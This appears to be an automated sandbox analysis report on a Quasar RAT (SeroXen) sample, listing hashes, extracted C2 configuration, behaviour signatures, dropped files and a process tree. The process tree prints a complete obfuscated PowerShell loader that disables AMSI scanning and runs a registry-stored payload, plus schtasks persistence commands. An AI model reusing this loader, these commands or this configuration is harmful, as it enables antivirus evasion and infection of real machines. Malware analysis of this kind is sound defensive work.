Analysis

  • max time kernel
    114s
  • max time network
    115s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-05-2024 07:55

Errors

Reason
Machine shutdown

General

  • Target

    Uni.exe

  • Size

    409KB

  • MD5

    4c2bb0618a6eda615c8001d5a7ccd6c0

  • SHA1

    c88d2c8bfc5906a5cfef78893d1132edcffd71f0

  • SHA256

    abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6

  • SHA512

    6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027

  • SSDEEP

    12288:rpg6M1i1v6q1ak/e7xlX7nnvGAwhJLJO:lxqiii6xlLvGjhO

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

tue-jake.gl.at.ply.gg:29058

Mutex

$Sxr-xPAuDxLNyBmZ7S2WLJ

Attributes
  • encryption_key

    Pw78RUs175dFrKD7lMwH

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    SeroXen

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 53 IoCs
  • Modifies registry class 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1016
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{cc324a1a-42d0-4b5a-832e-e221ec591320}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4828
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:940
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:732
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:748
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1128
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1136
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1144
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2772
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HetgjIEFfRmc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PVWdyiCzmAbCCq,[Parameter(Position=1)][Type]$OdYovBWWlc)$fjrMwgwDTuH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+'yD'+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'ublic'+','+''+'S'+'ea'+'l'+''+[Char](101)+''+'d'+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$fjrMwgwDTuH.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+'a'+''+'m'+'e'+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+'S'+'i'+''+[Char](103)+''+','+''+'P'+''+'u'+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$PVWdyiCzmAbCCq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');$fjrMwgwDTuH.DefineMethod(''+'I'+''+'n'+''+'v'+'o'+[Char](107)+''+'e'+'',''+'P'+'u'+[Char](98)+'l'+'i'+''+[Char](99)+','+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+',N'+[Char](101)+''+'w'+'S'+'l'+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$OdYovBWWlc,$PVWdyiCzmAbCCq).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'nag'+[Char](101)+''+[Char](100)+'');Write-Output $fjrMwgwDTuH.CreateType();}$eVUESmZakaoOC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+'.'+''+'W'+'i'+[Char](110)+''+'3'+''+[Char](50)+'.Un'+'s'+'af'+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+'i'+'v'+'e'+'M'+'e'+'t'+[Char](104)+''+[Char](111)+''+'d'+'s');$OaTIeDqGAdMevr=$eVUESmZakaoOC.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+'cA'+'d'+'d'+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,'+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KIVRBVYZAQwUsbydoJO=HetgjIEFfRmc @([String])([IntPtr]);$yFNYAUBjtgKUzwFdbFTmYw=HetgjIEFfRmc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hEjAHDOsAYu=$eVUESmZakaoOC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('ker'+[Char](110)+''+[Char](101)+'l'+'3'+''+'2'+''+[Char](46)+''+'d'+'l'+[Char](108)+'')));$CFTtcBnQDAHZMj=$OaTIeDqGAdMevr.Invoke($Null,@([Object]$hEjAHDOsAYu,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+'b'+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$EVFQLtkjaCHuVDGAt=$OaTIeDqGAdMevr.Invoke($Null,@([Object]$hEjAHDOsAYu,[Object]('V'+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+'t')));$KAXFwar=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CFTtcBnQDAHZMj,$KIVRBVYZAQwUsbydoJO).Invoke('am'+'s'+'i'+'.'+'dl'+[Char](108)+'');$kafnhpDCNIMMYQscX=$OaTIeDqGAdMevr.Invoke($Null,@([Object]$KAXFwar,[Object](''+'A'+''+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+'a'+''+'n'+''+[Char](66)+''+[Char](117)+'f'+'f'+''+[Char](101)+'r')));$bpCFMgIYRx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EVFQLtkjaCHuVDGAt,$yFNYAUBjtgKUzwFdbFTmYw).Invoke($kafnhpDCNIMMYQscX,[uint32]8,4,[ref]$bpCFMgIYRx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kafnhpDCNIMMYQscX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EVFQLtkjaCHuVDGAt,$yFNYAUBjtgKUzwFdbFTmYw).Invoke($kafnhpDCNIMMYQscX,[uint32]8,0x20,[ref]$bpCFMgIYRx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+'7'+''+[Char](55)+''+'s'+'t'+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4288
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1152
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1248
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1300
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1312
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1392
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1520
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2540
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1528
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1544
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1656
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1700
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1752
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1804
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1880
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1996
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:2008
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1508
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1952
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2068
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2144
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2240
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2288
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                1⤵
                                                                  PID:2560
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2576
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2584
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2764
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2808
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                        1⤵
                                                                          PID:2840
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2848
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2880
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2888
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3096
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3400
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                      PID:3500
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Uni.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
                                                                                        2⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1588
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
                                                                                          3⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:3924
                                                                                        • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:464
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                            4⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:5060
                                                                                          • C:\Users\Admin\AppData\Local\Temp\nUYVVSgTogoI.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\nUYVVSgTogoI.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Writes to the Master Boot Record (MBR)
                                                                                            PID:2384
                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4652
                                                                                        • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                          "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
                                                                                          3⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:5008
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                      1⤵
                                                                                        PID:3628
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                        1⤵
                                                                                          PID:3828
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:3992
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:4128
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4608
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                              1⤵
                                                                                                PID:4788
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                1⤵
                                                                                                  PID:2948
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                  1⤵
                                                                                                    PID:1036
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:336
                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:3860
                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4860
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:4032
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                        1⤵
                                                                                                          PID:3168
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:1788
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:2596
                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              1⤵
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Enumerates system info in registry
                                                                                                              PID:3748
                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                              1⤵
                                                                                                                PID:3224

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\install.exe

                                                                                                                Filesize

                                                                                                                162KB

                                                                                                                MD5

                                                                                                                152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                SHA1

                                                                                                                c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                SHA256

                                                                                                                a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                SHA512

                                                                                                                2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\nUYVVSgTogoI.exe

                                                                                                                Filesize

                                                                                                                225KB

                                                                                                                MD5

                                                                                                                af2379cc4d607a45ac44d62135fb7015

                                                                                                                SHA1

                                                                                                                39b6d40906c7f7f080e6befa93324dddadcbd9fa

                                                                                                                SHA256

                                                                                                                26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739

                                                                                                                SHA512

                                                                                                                69899c47d0b15f92980f79517384e83373242e045ca696c6e8f930ff6454219bf609e0d84c2f91d25dfd5ef3c28c9e099c4a3a918206e957be806a1c2e0d3e99

                                                                                                              • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

                                                                                                                Filesize

                                                                                                                409KB

                                                                                                                MD5

                                                                                                                4c2bb0618a6eda615c8001d5a7ccd6c0

                                                                                                                SHA1

                                                                                                                c88d2c8bfc5906a5cfef78893d1132edcffd71f0

                                                                                                                SHA256

                                                                                                                abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6

                                                                                                                SHA512

                                                                                                                6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027

                                                                                                              • C:\Windows\Temp\__PSScriptPolicyTest_4jlxxquv.2w3.ps1

                                                                                                                Filesize

                                                                                                                60B

                                                                                                                MD5

                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                SHA1

                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                SHA256

                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                SHA512

                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                              • memory/464-13-0x0000000074650000-0x0000000074E00000-memory.dmp

                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/464-713-0x0000000074650000-0x0000000074E00000-memory.dmp

                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/464-712-0x0000000074650000-0x0000000074E00000-memory.dmp

                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/464-22-0x0000000006270000-0x000000000627A000-memory.dmp

                                                                                                                Filesize

                                                                                                                40KB

                                                                                                              • memory/464-14-0x0000000074650000-0x0000000074E00000-memory.dmp

                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/616-49-0x000002B39B4C0000-0x000002B39B4E5000-memory.dmp

                                                                                                                Filesize

                                                                                                                148KB

                                                                                                              • memory/616-50-0x000002B39B8F0000-0x000002B39B91B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/616-57-0x000002B39B8F0000-0x000002B39B91B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/616-58-0x00007FFAB8090000-0x00007FFAB80A0000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/616-51-0x000002B39B8F0000-0x000002B39B91B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/668-69-0x00007FFAB8090000-0x00007FFAB80A0000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/668-68-0x0000018D062D0000-0x0000018D062FB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/668-62-0x0000018D062D0000-0x0000018D062FB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/732-95-0x0000020AD4B60000-0x0000020AD4B8B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/940-80-0x00007FFAB8090000-0x00007FFAB80A0000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/940-73-0x000001D038510000-0x000001D03853B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/940-79-0x000001D038510000-0x000001D03853B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/1016-91-0x00007FFAB8090000-0x00007FFAB80A0000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/1016-84-0x0000024223370000-0x000002422339B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/1016-90-0x0000024223370000-0x000002422339B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/1588-21-0x0000000074650000-0x0000000074E00000-memory.dmp

                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/1588-5-0x00000000059B0000-0x0000000005A16000-memory.dmp

                                                                                                                Filesize

                                                                                                                408KB

                                                                                                              • memory/1588-1-0x0000000000E30000-0x0000000000E9C000-memory.dmp

                                                                                                                Filesize

                                                                                                                432KB

                                                                                                              • memory/1588-2-0x0000000005EC0000-0x0000000006464000-memory.dmp

                                                                                                                Filesize

                                                                                                                5.6MB

                                                                                                              • memory/1588-3-0x0000000005910000-0x00000000059A2000-memory.dmp

                                                                                                                Filesize

                                                                                                                584KB

                                                                                                              • memory/1588-4-0x0000000074650000-0x0000000074E00000-memory.dmp

                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/1588-6-0x00000000066B0000-0x00000000066C2000-memory.dmp

                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/1588-0-0x000000007465E000-0x000000007465F000-memory.dmp

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/1588-7-0x0000000006BF0000-0x0000000006C2C000-memory.dmp

                                                                                                                Filesize

                                                                                                                240KB

                                                                                                              • memory/4288-30-0x0000023EF3BB0000-0x0000023EF3BD2000-memory.dmp

                                                                                                                Filesize

                                                                                                                136KB

                                                                                                              • memory/4288-33-0x0000023EF60C0000-0x0000023EF60EA000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/4288-34-0x00007FFAF8010000-0x00007FFAF8205000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                              • memory/4288-35-0x00007FFAF7490000-0x00007FFAF754E000-memory.dmp

